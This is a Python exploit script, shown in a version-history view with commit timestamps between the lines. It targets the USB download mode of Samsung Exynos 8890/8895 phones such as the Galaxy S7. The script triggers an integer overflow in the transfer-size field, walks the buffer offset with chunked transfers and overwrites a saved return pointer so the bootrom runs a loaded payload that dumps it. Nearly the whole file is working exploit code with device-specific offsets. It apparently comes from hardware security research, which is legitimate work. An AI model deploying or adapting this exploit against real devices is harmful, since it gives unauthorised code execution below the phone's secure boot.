Samsung_S7/exploit.py

157 lines
5.9 KiB
Python
Raw Normal View History

2024-01-02 12:27:07 +00:00
import usb.core
import usb.util
2024-07-15 09:30:03 +00:00
import struct, sys, usb1, libusb1, ctypes
# from ghidra_assistant.utils.utils import *
def p32(x):
return struct.pack("<I", x)
def p8(x):
return struct.pack("<B", x)
def p16(x):
return struct.pack("<H", x)
def p64(x):
return struct.pack("<Q", x)
2024-01-02 12:27:07 +00:00
BLOCK_SIZE = 512
CHUNK_SIZE = 0xfffe00
MAX_PAYLOAD_SIZE = (BLOCK_SIZE - 10)
DL_BUFFER_START = 0x02021800
DL_BUFFER_SIZE = 0x4E800 #0x02070000 End
BOOTROM_START = 0x0
BOOTROM_SIZE = 0x20000 #128Kb
2024-07-15 09:30:03 +00:00
TARGET_OFFSETS = {
# XFER_BUFFER, RA_PTR, XFER_END_SIZE
"8890": (0x02021800, 0x02020F08, 0x02070000),
"8895": (0x02021800, 0x02020F18, 0x02070000)
2024-01-02 12:27:07 +00:00
}
ENDPOINT_BULK_IN = 0x81
ENDPOINT_BULK_OUT = 0x2
class ExynosDevice():
def __init__(self, idVendor=0x04e8, idProduct=0x1234):
"""Init with vendor/product IDs"""
self.idVendor = idVendor
self.idProduct = idProduct
self.target = "8890" # TODO auto detect device
self.connect_device()
def connect_device(self):
self.context = usb1.USBContext()
2024-07-15 09:30:03 +00:00
while True:
self.handle = self.context.openByVendorIDAndProductID(
vendor_id=self.idVendor,
product_id=self.idProduct,
skip_on_error=True
)
if self.handle == None:
continue
break
2024-01-02 12:27:07 +00:00
print("Connected device!")
def write(self, data, size=-1):
transfered = 0
transferred = ctypes.c_int()
if size == -1:
size = len(data)
2024-07-15 09:30:03 +00:00
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, data, len(data), ctypes.byref(transferred), 0)
2024-01-02 12:27:07 +00:00
assert(res == 0)
return transfered
def send_empty_transfer(self):
2024-07-15 09:30:03 +00:00
transfered = 0x200
2024-01-02 12:27:07 +00:00
transferred = ctypes.c_int()
2024-07-15 09:30:03 +00:00
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, 0, 0, ctypes.byref(transferred), 0)
2024-01-02 12:27:07 +00:00
assert(res == 0)
return transfered
def test_bug(self):
# Start by sending a valid packet
2024-07-15 09:30:03 +00:00
# Integer overflow in the size field
# unk + size + payload + header
payload = p32(0) + p32(0xFDFDE7FF + 0x1000) + b"\x00" * MAX_PAYLOAD_SIZE + p16(0)
2024-01-02 12:27:07 +00:00
assert (len(payload) == BLOCK_SIZE)
self.write(payload, MAX_PAYLOAD_SIZE)
2024-07-15 09:30:03 +00:00
for i in range(200):
2024-01-02 12:27:07 +00:00
print(hex(self.send_empty_transfer()))
2024-07-15 09:30:03 +00:00
print('Bug probably available')
sys.exit(0)
2024-01-02 12:27:07 +00:00
def exploit(self, payload: bytes):
2024-07-15 09:30:03 +00:00
current_offset = TARGET_OFFSETS[self.target][0]
transferred = ctypes.c_int()
2024-07-15 21:33:09 +00:00
size_to_overflow = 0x100000000 - current_offset + TARGET_OFFSETS[self.target][1] + 8 + 6
2024-07-15 21:26:23 +00:00
max_payload_size = 0x100000000 - size_to_overflow
2024-07-15 21:33:09 +00:00
ram_size = ((size_to_overflow % CHUNK_SIZE) % BLOCK_SIZE)
2024-07-15 21:26:23 +00:00
# max_payload_size = 0xffffffff - current_offset + DL_BUFFER_SIZE + TARGET_OFFSETS[self.target][1]
# max_payload_size = (TARGET_OFFSETS[self.target][2] - TARGET_OFFSETS[self.target][0]) - 0x200
2024-07-15 09:30:03 +00:00
payload = payload + ((max_payload_size - len(payload)) * b"\x00")
assert len(payload) == max_payload_size, "Invalid payload"
# First send payload to trigger the bug
2024-07-15 21:26:23 +00:00
bug_payload = p32(0) + p32(size_to_overflow) + payload[:MAX_PAYLOAD_SIZE] # dummy packet for triggering the bug
bug_payload += b"\xcc" * (BLOCK_SIZE - len(bug_payload))
2024-07-15 09:30:03 +00:00
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, bug_payload, len(bug_payload), ctypes.byref(transferred), 0)
assert res == 0, "Error triggering payload"
2024-07-15 21:26:23 +00:00
assert transferred.value == len(bug_payload), "Invalid transfered size"
current_offset += len(bug_payload) - 8 # Remove header
2024-07-15 09:30:03 +00:00
# Send the actual payload
2024-07-15 21:26:23 +00:00
# res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, payload, len(payload), ctypes.byref(transferred), 0)
# assert res == 0, "Error sending payload"
# current_offset += len(payload)
2024-07-15 09:30:03 +00:00
2024-07-15 21:26:23 +00:00
cnt = 0
2024-07-15 09:30:03 +00:00
while True:
2024-07-15 21:26:23 +00:00
if current_offset + CHUNK_SIZE >= TARGET_OFFSETS[self.target][1] and current_offset < TARGET_OFFSETS[self.target][1]:
2024-07-15 09:30:03 +00:00
break
self.send_empty_transfer()
2024-07-15 21:26:23 +00:00
current_offset += CHUNK_SIZE
cnt += 1
if current_offset > 0x100000000:
current_offset = current_offset - 0x100000000 #reset 32 byte integer
print(f"{cnt} {hex(current_offset)}")
2024-07-15 09:30:03 +00:00
2024-07-15 21:26:23 +00:00
remaining = (TARGET_OFFSETS[self.target][1] - current_offset)
assert remaining != 0, "Invalid remaining, needs to be > 0 in order to overwrite with the last packet"
if remaining > BLOCK_SIZE:
self.send_empty_transfer()
# Send last transfer, TODO who aligns this ROM??
current_offset += ((remaining // BLOCK_SIZE) * BLOCK_SIZE)
cnt += 1
print(f"{cnt} {hex(current_offset)}")
2024-07-15 21:33:09 +00:00
# Build ROP chain.
rop_chain = (b"\x00" * (ram_size - 6)) + p64(TARGET_OFFSETS[self.target][0]) + (b"\x00" * 2)
2024-07-15 21:26:23 +00:00
transferred = ctypes.c_int(0)
2024-07-15 09:30:03 +00:00
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_OUT, rop_chain, len(rop_chain), ctypes.byref(transferred), 0)
2024-07-15 21:26:23 +00:00
# assert transferred.value == len(rop_chain), "Error sending ROP chain"
2024-07-15 09:30:03 +00:00
2024-07-15 21:26:23 +00:00
buf = ctypes.c_buffer(b"", 0x200000)
res = libusb1.libusb_bulk_transfer(self.handle._USBDeviceHandle__handle, ENDPOINT_BULK_IN, buf, len(buf), ctypes.byref(transferred), 1000)
2024-07-15 09:30:03 +00:00
pass
2024-01-02 12:27:07 +00:00
if __name__ == "__main__":
2024-07-15 09:30:03 +00:00
# wait_for_device()
2024-01-02 12:27:07 +00:00
exynos = ExynosDevice()
2024-07-15 09:30:03 +00:00
path = "dump/exynos-usbdl/payloads/Exynos8890_dump_bootrom.bin"
# path = "/home/eljakim/Source/gupje/source/bin/samsung_s7/debugger.bin"
exynos.exploit(open(path, "rb").read())
pass